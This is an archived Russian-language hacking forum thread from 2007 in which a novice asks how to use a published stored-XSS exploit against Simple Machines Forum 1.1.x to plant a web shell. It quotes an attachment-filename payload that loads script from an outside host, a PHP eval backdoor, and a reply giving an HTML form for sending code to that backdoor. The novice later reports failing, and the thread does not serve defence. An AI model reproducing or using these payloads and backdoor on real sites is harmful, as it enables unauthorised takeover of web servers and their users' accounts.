PDA

Просмотр полной версии : SMF Active XSS (тупой я)


Emory
08.07.2007, 14:41
здрасте пишу тут редко... в основном читаю и пытаюсь сам разобраться... но похоже по жизни я тупой... короче прошу кое-что объснить если не трудно...

решил я сий метод опробовать...
установил SMF 1.1.3 и решил все сделать как написано тут (http://forum.antichat.ru/thread42244-SMF.html)
Значит узнать есть ли в этой версии
"Отсутствует фильтрация atachment filename" я не знал как ... но там написано 1.1.2... поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать (я вам грил я нуб)
ну да ладно
значит начал тока готовиться(:D)
тупо скопировал ваш скрипт и тут подумал а нужно ли в нем что либо менять? в принципе это мой первый вопрос... ну короче я ничего не менял сохранил его ну и все... (зы решил я залить шелл)
тут возник еще один вопрос
name<img src=. width=1 height=1 onerror=javascript:var s=document.createElement('script');s.src='http: //site.com/smfexp.js';document.documentElement.firstChild. appendChild(s);>.txt
вот в этом тоже наверное что либо надо менять? так как посмотрел я на src=. и наверное тут должен быть сам шел... (это мои нубские предположения) (шел я решил взять (r57shell.php)( ps то что я делаю ваще прально??)
и видимо я должен буду туда ссылку на файл подставить? эт уже 3 или 4 вопрос...
еще не понял
По адресу http://vulnsite.com/smf/Themes/default/index.php получаем web shell
index.php который содержит код @eval($_POST['cd']);
для чего дан этот код? если шел уже буит работать?

ps сразу грю сильно не ругайтесь...
ps2 я понимаю скорее всего в версии 1.1.3 это уже исправлено но тогда представьте что я это делал на версии 1.1.2 ..хотя бы поясните ост вопросы если не трудно
ps3 заранее пасиб

blackybr
09.07.2007, 13:19
для чего дан этот код? если шел уже буит работать?

отправляешь скрипту пост запросы с шелл коммандами с параметром cd ..

а то что выше.. это не исполнение комманд.. это xss, читай маны

Dr.Z3r0
09.07.2007, 13:43
Прочитал что ты там написал понял только последний твой вопрос... Вот его тебе обясню подробнее...
После заливки шела берешь создаешь у ся на компе вот такую html страницу:

<form action="+++адрес скрипта+++" method="post">
Выполнить пхп код: <input type="text" name="cd" value="">
<input type="submit" value="выполнить">
</form>

Вводишь какойнить пхп код который хочешь выполнить, меняешь +++адрес скрипта+++ на тот шо тебе нужен, давишь выполнить и усе...

n-000
13.07.2007, 13:35
вот тут есть несколько примероф, может что полезнова для себя отыщеш
http://forum.antichat.ru/thread43633.html

Emory
17.07.2007, 20:46
спасибо
сейчас буду ознакамливаться


только куда сувать сам шелл? его адрес?

bopoh13
18.07.2007, 16:37
поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробоватьВопрос уже звучал: _http://www.simplemachines.ru/index.php/topic,2260.msg13571.html#msg13571
И был ответ (читать с цитаты): _http://www.simplemachines.ru/index.php/topic,2260.msg13666.html#msg13666
Ссылка на модуль (естественно, все на английском): _http://www.modsecurity.org/download/index.html

Хочу узнать, это гон?

Emory
23.07.2007, 00:08
мде
короче все что было (в моих силах) я сделал...
понятно что профы взломают но мне не удалось...
поюзал сплойт попробывал чрез аватарку фотку итд... стоят ограничения везде...
сканил сканером ничего особо важного=(
похоже мне такой сайт с форумом который уже залатан...
в принципе похоже что Smf так свой баг и не исправил....
спасиб всем...=)
пойдем дальше+)

bopoh13
01.10.2007, 14:06
Лавочку прикрыли =/
_http://www.simplemachines.org/community/index.php?topic=196380.0